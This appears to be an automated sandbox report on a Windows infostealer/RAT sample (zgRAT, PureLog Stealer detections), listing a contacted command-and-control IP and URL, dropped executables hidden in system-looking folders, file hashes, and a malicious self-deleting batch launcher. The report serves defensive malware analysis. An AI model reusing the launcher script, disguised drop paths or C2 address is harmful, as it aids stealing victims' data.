                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://206.188.197.24fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewinIntorefruntimebroker.exe, 00000004.00000002.1691880334.0000000004042000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/ProcessdumpmultifXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      206.188.197.24
                                      		unknownUnited States
                                      		55002DEFENSE-NETUStrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1583844
                                      Start date and time:2025-01-03 18:31:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 56s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:71
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:7vP2IvNXqx.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:1a3a764c4b4974435dba8926e7137766.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@114/50@0/1
                                      EGA Information:
                                      • Successful, ratio: 61.5%
                                      HCA Information:
                                      • Successful, ratio: 68%
                                      • Number of executed functions: 427
                                      • Number of non-executed functions: 115
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.44
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 2284 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 3384 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 7056 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 7652 because it is empty
                                      • Execution Graph export aborted for target winIntorefruntimebroker.exe, PID 7460 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: 7vP2IvNXqx.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      12:32:16API Interceptor10x Sleep call for process: fXvSafnhbinoSxnWSYFNsCJETLnb.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      DEFENSE-NETUSDEMONS.spc.elfGet hashmaliciousUnknownBrowse
                                      • 107.162.185.251
                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 170.158.166.84
                                      676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                      • 206.188.197.242
                                      PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                      • 206.188.197.242
                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 107.162.185.253
                                      home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 170.158.122.12
                                      bpaymentcopy.exeGet hashmaliciousHawkEye, MailPassView, PredatorPainRATBrowse
                                      • 207.204.50.48
                                      phish_alert_iocp_v1.4.48 (80).emlGet hashmaliciousInvoiceScamBrowse
                                      • 107.162.175.186
                                      2stage.ps1Get hashmaliciousUnknownBrowse
                                      • 206.188.196.37
                                      2stage.ps1Get hashmaliciousUnknownBrowse
                                      • 206.188.196.37

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Program Files (x86)\Windows Mail\e226a7d7102d53

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (679), with no line terminators
                                      Category:dropped
                                      Size (bytes):679
                                      Entropy (8bit):5.887376162593401
                                      Encrypted:false
                                      SSDEEP:12:b9Kr+9I/6AgvbS/LdWTpBEjcjskRL5iIs1kddAuw:b9KS9IyAgzS/peYcjRPiIs1kdd2
                                      MD5:DC5ED8C25462908FC261542380B69B55
                                      SHA1:D815F06648AD78103C68063552700F7D19C1C006
                                      SHA-256:D5DA9B967486D018E774F0B44A3BE944D23B1081F274D9E2F6BA5F60FC657663
                                      SHA-512:74D529CB2A78691685981D68A618477EAFDDF865FAA8CBAE282EA3D941ECDC37B22E408F500A97C4D8DEE2DF63DBD0CE7F189074A22C0EDED3C5C29A8731E2FB
                                      Malicious:false
                                      Preview:xiZmM4BhJ1xWE62Pn2LptqG5joPiDHXa0TCMePjtfnfBZA42fP2X4C6HbeDhpdeBdWgv4quXTbJFLFfjtXDxPAfyX4uAMCECJdhDeJ8yefEc216W9eyRaqwc0rY95tKQXH5rhcEkZOTu6D6f8XBsOwldqEMwv83uUxEu5OyhZN2MWCgxv2AhscClfcBdPRzaUiZJ8LktjeSA4ZGoiZB27VC2udPdNVRHYb1ymXykRR8OJCrFVW40Q6d9fgYf5HgNMKlciSBKkakqXxtrwJH0ab1c82SG8ToKuvC8bOhDVuPzVwlrxrtw9pwuTJeq95MRwa5mvvQhmEfqLBGMQkTRj1LF8RoSu1DZh8C5096BaMK4JFjRCSZYm4r4P0neG8wuAFJN8LVQoR0XrQ53rWPcboxmQHqAWb5cZZ3D6WT16JuUDTN94txtsUTWSg60eU3NVY8RW16VDXfR4cj74rFmoLtFFhvaZcWlPg8pV5mDxbqUyBbz696xPRiKp3MyFg5kB3CXe3l8ECzMeYQDG6dagiW88yActy7RgFT49DVCX7tNbWpQmIrJCeEchDZp3JPPFiqZFVEClaDizJgmItzlGxOBA0X5opIOseH3pQLRDphlbgnXgxhKUnIRTpYO8IY6Rz0VBn61iihbPmjeN9Y0I83EV0j926S4QlTmpRW

                                      C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\e226a7d7102d53

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (842), with no line terminators
                                      Category:dropped
                                      Size (bytes):842
                                      Entropy (8bit):5.887391669123621
                                      Encrypted:false
                                      SSDEEP:24:f/bf9JKPAJeJ5Z+XxZHZ7k3UzBysvwFmXPl:fzf9JKPUeJ5ZkZoEzBy+EmXt
                                      MD5:2B807045E47A02E2C37F798771C12135
                                      SHA1:D579B959F95D78D4B7474354C1D2F33A4AB643E7
                                      SHA-256:3D48C10B1A77C7A866036B817615022F121CCC16C3F3540D26A78C8135D46E78
                                      SHA-512:B8B9104091967F4940DB77626029395545530BCF191555F213B43AC6C7EAF79165379D76E303953BAF63CE338CFC9C897BBA16E6B4F700F3D27890294057A462
                                      Malicious:false
                                      Preview:KydQdxAB5vPyE0rzK80uRNRyoiWXRhH9XfT2bpEv8Y72ptEXbHOO4Yj6gom5amtYoQajgzXe4Ev2QZI4d96JS2E96XWxDIVWojOZSe1mtuU0mqqHgrcbpjFvLbnJdkbvtZOqKsm8HUZhiNXPqOQVq3qEdcN11rJJSjHMcA6xFdTVJhN8DXdOTFEztJMreuHZLQO8GLxpSdQNkU45OPxdO4zNeRdSyOSUV3K3SO12jx60y0OYOQdO7nLQbBdyrf1DK62qJBn9Y53b88ZoCEDhvDXrs4bRvCKE62p28hONnd0BttRcmzwnbTRHiK8PjVOWuzfGSgqfz04SNV88m9p5QhnmkiTxj9nSOdR4OLJFJQxkZ94NMAmkpTGNL2fuN250NmDtEDtbzkw9tDNloGliWDm5XDtVpZ2QV6Xw5KJIQLvFgGdIp4FHQWeJAIVAUYvZsfoxpapd6cSLRgYRkkpvTuA8cNwwzIy1ZVXBcqcPPlKxET2duEatsAF7fqVcn2oyobv6IWy3HZgrkM4IVTBvsEIZQagwV9mW7WJnh5UYPglTdXWSwMHU02FjSWqs0CiHxKuODRlZ8nfMcz52DNAJ2SfEQjUKPmiN7dfTnIPekrWNW3HcbxomCZPeop7e6bKVFSO8TlP58fiK6SrXb2tb75KiOAp7LviJhAHEpII0itng0EiW7jCDssXKHpuS6RuN6Zm5LnsTu22ORorJcSAlsfbzm769Yz4R9akbcmLT1tTzzI2d7k0nQIeb7xTNrs448lP1EQrzHqt9Lm9dFcCx8RA05IdoT7mJyZ0O3AZr3BfkYfPVyzIOqG5rkZ55wDfKEkKwvvkEDU

                                      C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      C:\Recovery\e226a7d7102d53

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (756), with no line terminators
                                      Category:dropped
                                      Size (bytes):756
                                      Entropy (8bit):5.885130050984507
                                      Encrypted:false
                                      SSDEEP:12:kmvmqDDsn7FzZexsQnihK5kL5EnJPZ3XSFroyaVXExnJPMbrxkKTUXZth5Z33f5K:kmvhWzKVnVPZioLtEjueKTUXTRHf5k+I
                                      MD5:0035C9C6BAB62443753FE55A0CCFBE14
                                      SHA1:B9756A4D04AB17FE993584AA0A1E2481E985E91D
                                      SHA-256:CEACFFD477BFEC8F788B2B3F0D927AEA3DC214D92C81BCE3A52292073F093605
                                      SHA-512:EFD4B0ACEC037FAE12160C8C885B27C66E12BD44540C96F5BD5A5351C70CE68FCB9FE80180798B0A8EB66CD3D3F4CBCCB83AC441AEA2A6A48F02982BB7C0DB94
                                      Malicious:false
                                      Preview:9pSe8ovaNk7vQN86OO7UzouJItnrtJcpEwHWjsWIyicERllOQM1SH85U5IVOADqEHRqdFmWg2zfRMp2hHYbgRKiF1xabWIHu2Y6A4IIozVZRdoIPQyGmmJw7tklSL5JusuYys1n9Pwr5uQmNpLKiBeIsl9RUg0c3LpisPUgYKGWzc1Mc7YnAvlsOmqMtkSdZTxuFr48VovX4HSPuwyWINcIk6UFiHxy2n7fpGHvDZSV9NxGUbc6w6UM1oKIWyaN17fRJwknpCSs5HJWINvHo0C5SvoB68YO9EeBsg6h0zRtnmRtex9JDSjA5j8YIjqqoEt0nInlQNQyjSSqe4gI8PLqedGIiiZRJkFj2aGWJX2zCubmRR4NChrY2CWJCfDsy8p9NsyDxJ8kXWotCd0RnLOl2qqzD7UoUJBDFbZjd0a2jGBgYmHiovEmtEGgB890zUQNVkokERyxvWBvpKba0v9iFYTAV2he0jDP0xLx8geX7R1XCV11gi9EUrI6RnPMuT6LTw418ncTRmlxh589Ap7Rk94JpOgVRRmnUpEQa923GqwrFUZVpPLEVolT1vMuHGC997c11rjBxEL3MNDUyLqBGhRqEuYoxIv9nxrI1ie7pKRRdrHos156aA3bpwxGT4OpSLPZf4dQqsV6QANWnt65Mzin4PcEuYov5m8RbsJxXoPso6Lpjbdj8SccmmfPcYgSEkAoB544kIhhk087ExfT5EwnJfpzN4V9I7oE5hnogi9zu42wn

                                      C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fXvSafnhbinoSxnWSYFNsCJETLnb.exe.log

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1523
                                      Entropy (8bit):5.373534083924954
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
                                      MD5:5E675003E8A6113031BC81EC692CFE0A
                                      SHA1:53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
                                      SHA-256:5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
                                      SHA-512:4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winIntorefruntimebroker.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1089
                                      Entropy (8bit):5.357509376572314
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4x
                                      MD5:84D615B35EDCC29D404E189F0403DF92
                                      SHA1:9FA889FD1624FD4D42C8A1E53A6C878D563B2B05
                                      SHA-256:ED840908AC2487C0156C61BBFCF4332B1824C033F03400FE906BBB44482205F5
                                      SHA-512:ED5F44D349501CBC583275E7298F7546BCAC71674055767E57CA620A0E3EC48FA23B62A3BB4153B14AB7778740298BAF89E68BBA3663542D9086C0FEDA1599CD
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                      C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):276
                                      Entropy (8bit):5.339396235008582
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f+U5zEh:HTg9uYDEarV1XFh6CDfE
                                      MD5:966AEE77CA87B66CC64A01E160B6E847
                                      SHA1:F8C695815CCC639AFDC08ADDB19CB3E580046334
                                      SHA-256:2EDADAC283F2960E0D9EA0B5AD61A53ED2E9D50A7D5E989E90BD6BE24C40E071
                                      SHA-512:FE6EA7A54DC89A374A98DDBC3F277066213CDF9B73C02AA869BE34C7EEE7D0A2C14AA6F8A42C0839B129322C91F95C37EAB3015D7427A1839071158EEC554393
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0WKriXx1WO.bat"

                                      C:\Users\user\AppData\Local\Temp\11kbZcySVL

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.243856189774723
                                      Encrypted:false
                                      SSDEEP:3:EiLrS:Pe
                                      MD5:C415E06820CD9115CC11D038540FC0D5
                                      SHA1:C9F688DE700821B4A539C97E6193713F3102131B
                                      SHA-256:052B5FD2306FC2E75FECFDD17778C926C5EDF36C235712DB1776B2B3C67E602D
